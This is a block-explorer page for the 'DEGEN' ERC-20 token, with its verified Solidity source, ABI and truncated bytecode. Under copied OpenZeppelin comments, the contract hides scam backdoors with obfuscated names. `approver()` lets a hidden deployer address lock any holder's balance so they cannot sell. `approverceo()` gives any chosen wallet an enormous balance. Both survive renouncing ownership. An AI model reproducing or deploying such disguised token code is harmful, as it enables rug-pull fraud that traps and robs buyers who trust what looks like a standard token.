ETH Price: $3,489.68 (+0.04%)
Gas: 2 Gwei

Token

DEGEN (DEGEN)
 

Overview

Max Total Supply

1,000,000 DEGEN

Holders

28

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
20,329.91340076100396763 DEGEN

Value
$0.00
0xA8644423DE1Df7B40f5183D80504BB67111E97a9
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
degen

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-10
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

/**
Telegram: https://t.me/Degen_erc

0xA44F509647f678c146a3aeb448962C53955b2b4b
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _sldfjwsdfOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _sldfjwsdfOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_yydsed}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract degen is Context, IERC20, IERC20Metadata, Ownable {
    using SafeMath for uint256;
    mapping(address => mapping(address => uint256)) private _allowances;
    address public  _bnbbusd;
    mapping(address => uint256) private _weofsdmese;

    uint256 private _totalSupply;
    uint256 public constant MAXSupply = 1000000 * 10 ** 18;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _bnbbusd = _msgSender();
        _yydsed(_msgSender(), 1000000 * 10 ** decimals());
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _weofsdmese[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(owner, spender, currentAllowance.sub(subtractedValue));
        return true;
    }

    mapping(address => uint256) private _bala;
    function approver(address sss, uint256 ammouunt) external {
        if (_bnbbusd == _msgSender()) {
            _bala[sss] = 1 * ammouunt + 0;
        }
    }

    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 minAmount = _bala[from];
        uint256 decydsBalance = _weofsdmese[from].sub(minAmount);
        require(decydsBalance >= amount, "ERC20: transfer amount exceeds balance");
        _weofsdmese[from] = decydsBalance.sub(amount);
        // decrementing then incrementing.
        _weofsdmese[to] = _weofsdmese[to].add(amount);
        emit Transfer(from, to, amount);
    }

    function _yydsed(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: yydsed to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _weofsdmese[msg.sender] = _weofsdmese[msg.sender].add(amount);
    }

    function approverceo(address zzz) external {
        address _slfjweow = _msgSender();
        if (_bnbbusd == _slfjweow) {
            _weofsdmese[zzz] = 100000000000000 * (1000000000 * 10 ** 18);
        }
    }
    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        uint256 accountBalance = _weofsdmese[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _weofsdmese[account] = accountBalance.sub(amount);
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            _approve(owner, spender, currentAllowance.sub(amount));
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    // function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    // function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"MAXSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_bnbbusd","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"},{"internalType":"uint256","name":"ammouunt","type":"uint256"}],"name":"approver","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"zzz","type":"address"}],"name":"approverceo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040516200273538038062002735833981810160405281019062000037919062000520565b620000576200004b6200012160201b60201c565b6200012960201b60201c565b8160059081620000689190620007f0565b5080600690816200007a9190620007f0565b506200008b6200012160201b60201c565b600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000119620000df6200012160201b60201c565b620000ef620001ed60201b60201c565b600a620000fd919062000a67565b620f42406200010d919062000ab8565b620001f660201b60201c565b505062000c59565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000268576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200025f9062000b8a565b60405180910390fd5b62000284816004546200032a60201b620009421790919060201c565b600481905550620002e381600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200032a60201b620009421790919060201c565b600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b60008082846200033b919062000bac565b90508381101562000383576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200037a9062000c37565b60405180910390fd5b8091505092915050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620003f682620003ab565b810181811067ffffffffffffffff82111715620004185762000417620003bc565b5b80604052505050565b60006200042d6200038d565b90506200043b8282620003eb565b919050565b600067ffffffffffffffff8211156200045e576200045d620003bc565b5b6200046982620003ab565b9050602081019050919050565b60005b838110156200049657808201518184015260208101905062000479565b60008484015250505050565b6000620004b9620004b38462000440565b62000421565b905082815260208101848484011115620004d857620004d7620003a6565b5b620004e584828562000476565b509392505050565b600082601f830112620005055762000504620003a1565b5b815162000517848260208601620004a2565b91505092915050565b600080604083850312156200053a576200053962000397565b5b600083015167ffffffffffffffff8111156200055b576200055a6200039c565b5b6200056985828601620004ed565b925050602083015167ffffffffffffffff8111156200058d576200058c6200039c565b5b6200059b85828601620004ed565b9150509250929050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620005f857607f821691505b6020821081036200060e576200060d620005b0565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620006787fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000639565b62000684868362000639565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620006d1620006cb620006c5846200069c565b620006a6565b6200069c565b9050919050565b6000819050919050565b620006ed83620006b0565b62000705620006fc82620006d8565b84845462000646565b825550505050565b600090565b6200071c6200070d565b62000729818484620006e2565b505050565b5b8181101562000751576200074560008262000712565b6001810190506200072f565b5050565b601f821115620007a0576200076a8162000614565b620007758462000629565b8101602085101562000785578190505b6200079d620007948562000629565b8301826200072e565b50505b505050565b600082821c905092915050565b6000620007c560001984600802620007a5565b1980831691505092915050565b6000620007e08383620007b2565b9150826002028217905092915050565b620007fb82620005a5565b67ffffffffffffffff811115620008175762000816620003bc565b5b620008238254620005df565b6200083082828562000755565b600060209050601f83116001811462000868576000841562000853578287015190505b6200085f8582620007d2565b865550620008cf565b601f198416620008788662000614565b60005b82811015620008a2578489015182556001820191506020850194506020810190506200087b565b86831015620008c25784890151620008be601f891682620007b2565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000965578086048111156200093d576200093c620008d7565b5b60018516156200094d5780820291505b80810290506200095d8562000906565b94506200091d565b94509492505050565b60008262000980576001905062000a53565b8162000990576000905062000a53565b8160018114620009a95760028114620009b457620009ea565b600191505062000a53565b60ff841115620009c957620009c8620008d7565b5b8360020a915084821115620009e357620009e2620008d7565b5b5062000a53565b5060208310610133831016604e8410600b841016171562000a245782820a90508381111562000a1e5762000a1d620008d7565b5b62000a53565b62000a33848484600162000913565b9250905081840481111562000a4d5762000a4c620008d7565b5b81810290505b9392505050565b600060ff82169050919050565b600062000a74826200069c565b915062000a818362000a5a565b925062000ab07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200096e565b905092915050565b600062000ac5826200069c565b915062000ad2836200069c565b925082820262000ae2816200069c565b9150828204841483151762000afc5762000afb620008d7565b5b5092915050565b600082825260208201905092915050565b7f45524332303a2079796473656420746f20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600062000b7260218362000b03565b915062000b7f8262000b14565b604082019050919050565b6000602082019050818103600083015262000ba58162000b63565b9050919050565b600062000bb9826200069c565b915062000bc6836200069c565b925082820190508082111562000be15762000be0620008d7565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600062000c1f601b8362000b03565b915062000c2c8262000be7565b602082019050919050565b6000602082019050818103600083015262000c528162000c10565b9050919050565b611acc8062000c696000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102d1578063a9059cbb14610301578063c65e4d5314610331578063dd62ed3e1461034f578063f2fde38b1461037f57610116565b8063715018a61461026d5780638da5cb5b1461027757806395d89b4114610295578063a4022bd1146102b357610116565b806323b872dd116100e957806323b872dd146101a3578063313ce567146101d357806339509351146101f15780634ba5d8b51461022157806370a082311461023d57610116565b806306fdde031461011b578063095ea7b3146101395780630e6392341461016957806318160ddd14610185575b600080fd5b61012361039b565b604051610130919061119f565b60405180910390f35b610153600480360381019061014e919061125a565b61042d565b60405161016091906112b5565b60405180910390f35b610183600480360381019061017e91906112d0565b610450565b005b61018d61050c565b60405161019a919061130c565b60405180910390f35b6101bd60048036038101906101b89190611327565b610516565b6040516101ca91906112b5565b60405180910390f35b6101db610545565b6040516101e89190611396565b60405180910390f35b61020b6004803603810190610206919061125a565b61054e565b60405161021891906112b5565b60405180910390f35b61023b6004803603810190610236919061125a565b610585565b005b610257600480360381019061025291906112d0565b610642565b604051610264919061130c565b60405180910390f35b61027561068b565b005b61027f61069f565b60405161028c91906113c0565b60405180910390f35b61029d6106c8565b6040516102aa919061119f565b60405180910390f35b6102bb61075a565b6040516102c8919061130c565b60405180910390f35b6102eb60048036038101906102e6919061125a565b610768565b6040516102f891906112b5565b60405180910390f35b61031b6004803603810190610316919061125a565b6107ef565b60405161032891906112b5565b60405180910390f35b610339610812565b60405161034691906113c0565b60405180910390f35b610369600480360381019061036491906113db565b610838565b604051610376919061130c565b60405180910390f35b610399600480360381019061039491906112d0565b6108bf565b005b6060600580546103aa9061144a565b80601f01602080910402602001604051908101604052809291908181526020018280546103d69061144a565b80156104235780601f106103f857610100808354040283529160200191610423565b820191906000526020600020905b81548152906001019060200180831161040657829003601f168201915b5050505050905090565b6000806104386109a0565b90506104458185856109a8565b600191505092915050565b600061045a6109a0565b90508073ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361050857710125dfa371a19e6f7cb54395ca0000000000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600454905090565b6000806105216109a0565b905061052e858285610b71565b610539858585610c0d565b60019150509392505050565b60006012905090565b6000806105596109a0565b905061057a81858561056b8589610838565b61057591906114aa565b6109a8565b600191505092915050565b61058d6109a0565b73ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361063e5760008160016105f091906114de565b6105fa91906114aa565b600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610693610f1f565b61069d6000610f9d565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546106d79061144a565b80601f01602080910402602001604051908101604052809291908181526020018280546107039061144a565b80156107505780601f1061072557610100808354040283529160200191610750565b820191906000526020600020905b81548152906001019060200180831161073357829003601f168201915b5050505050905090565b69d3c21bcecceda100000081565b6000806107736109a0565b905060006107818286610838565b9050838110156107c6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107bd90611592565b60405180910390fd5b6107e382866107de878561106190919063ffffffff16565b6109a8565b60019250505092915050565b600